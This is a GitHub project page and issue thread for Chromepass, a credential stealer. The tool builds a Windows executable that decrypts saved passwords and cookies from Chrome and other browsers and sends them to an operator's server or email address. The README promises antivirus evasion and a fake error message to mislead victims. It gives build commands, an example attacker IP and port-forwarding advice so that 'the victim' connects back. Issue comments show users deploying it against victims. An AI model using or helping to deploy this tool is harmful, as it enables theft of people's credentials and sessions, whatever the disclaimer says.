Chromepass - Hacking Chrome Saved Passwords

Overview

Chromepass - Hacking Chrome Saved Passwords and Cookies

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

View Demo · Report Bug · Request Feature

Table of Contents


About The project

Chromepass is a python-based console application that generates a windows executable with the following features:

  • Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies
  • Send a file with the login/password combinations and cookies remotely (http server or email)
  • Undetectable by AV if done correctly
  • Custom icon
  • Custom error message
  • Customize port

AV Detection!

The new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion.

An example of latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds):


Getting started

Dependencies and Requirements

This is a very simple application, which uses only:

  • Python - Tested on python 3.9+

It recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.

Installation

Chromepass requires Windows to compile! Support for linux and macOS may be added soon.

Clone the repository:

git clone https://github.com/darkarp/chromepass

Note: Alternatively to cloning the repository, you can download the latest release, since the repository may be more bug-prone.

Install the dependencies:

The dependencies are checked and installed automatically, so you can just skip to Usage. It's recommended that you use a clean VM, just to make sure there are no conflicts.

If you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee.


Usage

Chromepass is very straightforward. Start by running:

python create.py -h

A list of options will appear and are self explanatory.

Running without any parameters will build the server and the client connecting to 127.0.0.1.

A simple example of a build:

python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

After creating the server and the client, make sure you're running the server when the client is ran.

The cookies and passwords will be saved in json files on a new folder called data in the same directory as the server, separated by ip address.


Email

Chromepass supports sending the files via email, although it's still experimental. To enable this, you can use the --email flag while creating the server. You'll need two things, a username (your email) and a password (an app password).

To generate an app password you must go into your account settings -> Security and enable 2-step authentication (required!)

After 2-step authentication is enabled, you'll see a new option called App Passwords: 2-step-authentication

You want to click there and then choose the appropriate options and then generate a password: 2-step-authentication

After clicking Generate it will give you the needed password. You can use the username and password directly in the command or you can simply put it inside the config.ini, where it says YOUR_USERNAME and YOUR_PASSWORD.

Example with credentials in command

python create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh

If you put the credentials in the config file (you'll see where if you open this file)

python create.py --error --message 'An Error has happened' --email

Remote Notes

If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port.
For more general information, click here. If you're still not satisfied, perform a google search.


Manual dependency installation

The automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually.
Fortunately, there are only 2 dependencies:

Instead of the build tools you can also just install visual studio but it will take more space.

After successfully installing the build tools, you can simply run the rustup-init.exe from Rustup's website.

This completes the required dependencies and you should be good to go.


Errors, Bugs and feature requests

If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.

Please follow the templates shown when creating the issue.


Learn More

For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking

If you wish to contact me, you can do so via: [email protected]


Disclaimer

I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.

License

AGPL-3.0


Code Intelligence Status

Demo

til

Comments
  • ImportError: DLL load failer: The specified module could not be found.

    ImportError: DLL load failer: The specified module could not be found.

    File "C:\Users\*****\Desktop\chrome-password-hacking-master\create_server.py", line 3, in import os, sys, cgi, py2exe, BaseHTTPServer, sqlite3, win32crypt ImportError: DLL load failed: The specified module could not be found.

    I have tried running the powershell command, and have installed python 2.7 in 32 bit and everything else in 32 bit. Not sure why it still doesn't work.

    Errors not related to the code Fixed 
    opened by bowser0000 14
  • I don't receive the email.

    I don't receive the email.

    I'm somewhat new to python and learning online. When I try it on my own PC I get this error Traceback (most recent call last): File "server.py", line 97, in File "server.py", line 38, in getpass File "shutil.pyo", line 82, in copyfile IOError: [Errno 2] No such file or directory: 'C:\\Users\DELL\AppData\Local\Google\Chrome\User Data\Default\Login Data' I'm stuck here. I could use your help. Thanks in advance.

    Complete 
    opened by newestmindcoder 11
  • Can't get it to work at all on multiple computers

    Can't get it to work at all on multiple computers

    I tried the steps on different windows 10 computers and cannot get it to work. There is always some sort of error. I don't know anything about programming so I don't know the issue. I currently don't have any screenshots of the error because I uninstalled/deleted everything related to it. I also couldn't get your malkit to work.

    I am currently downloading a Windows 10 VM in a last ditch effort. I just gotta ask: Does this only work on a VM?

    bug enhancement In progress 
    opened by Genus-learner 9
  • Gmail blocking, when it try to login on other devices.

    Gmail blocking, when it try to login on other devices.

    So yes, gmail sending me an alert that someone was trying to log into my account, and it blocking it. I tried to start it on second pc, and it worked, because i already was logging there. I tunred on "Let less secure apps access your account" of course, so I don't know what is the problem. So I tried getting files directly by IP. But it giving me .py output, not .exe. How to change it?...

    enhancement Complete Errors not related to the code 
    opened by Subucc 9
  • when i am trying to create server nothing is happened

    when i am trying to create server nothing is happened

    Describe the bug A clear and concise description of what the bug is.

    To Reproduce Steps to reproduce the behavior:

    1. Go to '...'
    2. Click on '....'
    3. Scroll down to '....'
    4. See error

    Expected behavior A clear and concise description of what you expected to happen.

    Screenshots If applicable, add screenshots to help explain your problem.

    Software(please complete the following information):

    • OS: [e.g. Windows 10 Pro x64]
    • Python Version [e.g. 3.7.4]
    • Python Environment [e.g. Normal python, conda env]

    Additional context Add any other context about the problem here. image

    Errors not related to the code 
    opened by kiopik 8
  • Issue with the code

    Issue with the code

    File "create_server.py", line 2, in import os, sys, cgi, py2exe, BaseHTPPServer, sqlite3 , win32crypt ImportError: DLL load failer: The specified module could not be found. Any idea?

    Errors not related to the code Fixed 
    opened by JohnMos 8
  • Only cookies being sent?

    Only cookies being sent?

    So I got it working on multiple computers but for some of them they client only sends cookies? I've tried running it as admin and that hasnt done anything to help that

    Any suggestions?

    bug Complete 
    opened by Genus-learner 7
  • Batch / Shell Scripts for building

    Batch / Shell Scripts for building

    Is your feature request related to a problem? Please describe. The README has a lot of steps that can take a while to complete, for example, the build process from the Demo, and the "AV Detection" segment of the readme instruction.

    Describe the solution you'd like .bat or .sh files can be used to automate most (if not all) of the steps necessary to build the application. Alternatively, a Python script can be used to run everything, which could make supporting cross-platform usage easier.

    enhancement Complete 
    opened by iCrazyBlaze 5
  • What about a fake SMTP server support instead of email ?

    What about a fake SMTP server support instead of email ?

    Just like this https://github.com/aydinnyunus/WifiPassword-Stealer

    Also what do you think about these methods of protecting the excitable Here https://github.com/hawksh/Hidden-miner-builder

    opened by minanagehsalalma 5
  • create_server.py stuck on *** searching for required modules ***

    create_server.py stuck on *** searching for required modules ***

    Hi, I've got an issue like the title of this thread. It comes up after the script builds the "build, bdist.win32, winexe, collect-2.7, bundle-2.7, temp and dist" folders. I'm using Python 2.7 and py2exe 32-bit like instructed. I chose the option to email the fetched passwords via Gmail, and send them to a different email than the mail I gave up to login on Gmail.

    What's going wrong here?

    (Quick edit: I've left the script running like this for quite a while, so I really think it's stuck rather than actually searching for modules...)

    Screenshot: issue

    Complete 
    opened by lucs29 5
  • Error

    Error

    When I try it out on my PC, it works fine. But when I send it to the victim. He gets the Fake Error. And I get an email, but the password and User area
    is blank.

    Complete Errors not related to the code 
    opened by GR8Zen 4
  • link.exe not found

    link.exe not found

    [+] Building Server Compiling proc-macro2 v1.0.28 Compiling syn v1.0.74 Compiling winapi v0.3.9 Compiling memchr v2.4.0 Compiling futures-core v0.3.16 Compiling proc-macro-hack v0.5.19 Compiling log v0.4.14 Compiling futures-sink v0.3.16 Compiling lazy_static v1.4.0 Compiling winapi v0.2.8 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile futures-core due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile log due to previous error error: could not compile memchr due to previous error error: could not compile proc-macro-hack due to previous error error: could not compile syn due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Server couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-server/target/release/chromepass-server.exe' [+] Building Client Compiling winapi v0.3.9 Compiling proc-macro2 v1.0.24 Compiling libc v0.2.99 Compiling syn v1.0.64 Compiling serde v1.0.127 Compiling serde_derive v1.0.127 Compiling log v0.4.14 Compiling memchr v2.3.4 error: linker link.exe not found | = note: program not found

    note: the msvc targets depend on the msvc linker but link.exe was not found

    note: please ensure that VS 2013, VS 2015, VS 2017, VS 2019 or VS 2022 was installed with the Visual C++ option

    error: could not compile log due to previous error warning: build failed, waiting for other jobs to finish... error: could not compile memchr due to previous error error: could not compile syn due to previous error error: could not compile serde_derive due to previous error error: could not compile serde due to previous error error: could not compile libc due to previous error error: could not compile proc-macro2 due to previous error error: could not compile winapi due to previous error [-] Client couldn't be copied: [Errno 2] No such file or directory: 'templates/chromepass-build/target/release/chromepass.exe' [-] Error building the server [-] Error building the client

    opened by LLSWIMS 1
  • Client not communicating with Server

    Client not communicating with Server

    I had this running great. I would double click the client, I would see the connection to the server and then the text files would generate. Then all of a sudden, the client stopped sending/communicating to the server.

    Here are my steps:

    -Run create.py with no parameters

    -Server and client built successfully

    -Run the server and keep it open

    -Run the client

    -Check the server...but server does not show a connection (just the usual "waiting for connections")

    I have used this successfully about a week ago both for local testing and with port forwarding and static ip but now I can't even get it to run locally. I have tried on 3 different computers which finish the build successfully w/no errors but I receive the same issue. All computers with the below specs:

    Running on: -Windows 10 Pro x64 -Python 3.10 -Built on both Pycharm and Powershell (I tried on both....which build successfully but I receive the same outcome) -No antivirus installed and Windows firewall is disabled -Downloaded a fresh copy of all files from Github -Also tried the exact copy I used a week ago

    One day it was working....the next it wasn't. Any suggestions on what I could try to get the communication to occur? CP

    bug In progress 
    opened by twhitey666 3
  • Emails not being received

    Emails not being received

    I've built the most recent version and the client and server are working perfectly but no emails are received. Is there any way to check on the client to check what is happening?

    I've also noticed the client won't include passwords synced using a Google account or imported passwords.

    bug In progress 
    opened by graemeh70 3
Releases(V4.1.4)
Owner
darkArp
Malware Analyst | Penetration Tester
darkArp
SSRF search vulnerabilities exploitation extended.

This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

Andri Wahyudi 13 Jul 04, 2021
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

3 Aug 13, 2022
Apache OFBiz rmi反序列化EXP(CVE-2021-26295)

Apache OFBiz rmi反序列化EXP(CVE-2021-26295) 目前仅支持nc弹shell 将ysoserial.jar放置在同目录下,py3运行,根据提示输入漏洞url,你的vps地址和端口 第二次使用建议删除exp.ot 本工具仅用于安全测试,禁止未授权非法攻击站点,否则后果自负

15 Nov 09, 2022
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

86 Dec 09, 2022
Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29. This vulnerability is commonly referred to as "Sprin

Chris Partridge 105 Nov 26, 2022
Ethereum transaction decoder (community version).

EthTx Community Edition Community version of EthTx transaction decoder Local environment For local instance, you need few things: Depending on your di

240 Dec 21, 2022
A simple Outline Server Access Key Copy and Paste Web Interface

Outline Keychain A simple Outline Server Access Key Copy and Paste Web Interface Developed for key and password export and copy & paste for other Shad

Zhe 1 Dec 28, 2021
CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.

CVE-2021-43936 CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware. This vulnerability w

Jeremiasz Pluta 8 Jul 05, 2022
🍉一款基于Python-Django的多功能Web安全渗透测试工具,包含漏洞扫描,端口扫描,指纹识别,目录扫描,旁站扫描,域名扫描等功能。

Sec-Tools 项目介绍 系统简介 本项目命名为Sec-Tools,是一款基于 Python-Django 的在线多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。本系统通过旁站探测和域名探测功能对待检测网站进行资产收集,通过端

简简 300 Jan 07, 2023
Steal Files on a Windows Machine

File-Stealer Steal Files on a Windows Machine About This Script will steal certain Files on a Windows Machine and sends them to a FTP Server. Preview

Marcel 5 Nov 17, 2022
Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

Tenssens framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources.

Md. Nur habib 31 Oct 21, 2022
POC for detecting the Log4Shell (Log4J RCE) vulnerability.

log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py pathToTargetFile

BCC Risk Advisory 2 Dec 22, 2021
Pgen is the best brute force password generator and it is improved from the cupp.py

pgen Pgen is the best brute force password generator and it is improved from the cupp.py The pgen tool is dedicated to Leonardo da Vinci -Time stays l

heyheykids 2 Jan 31, 2022
CVE-2021-26855: PoC (Not a HoneyPoC for once!)

Exch-CVE-2021-26855 ProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker b

ZephrFish 24 Nov 14, 2022
SpiderFoot automates OSINT collection so that you can focus on analysis.

SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

Steve Micallef 9k Jan 08, 2023
Lite version of my Gatekeeper backdoor for public use.

MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee

Joe Helle 56 Mar 25, 2022
Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR

Pushpender Singh 9 Dec 12, 2022
SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Bad Blood Bad Blood is an exploit for CVE-2021-20038, a stack-based buffer overflow in the httpd binary of SMA-100 series systems using firmware versi

Jake Baines 80 Dec 29, 2022
WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user.

WinRemoteEnum WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user, sharing the goal of remotely gather

Simon 9 Nov 09, 2022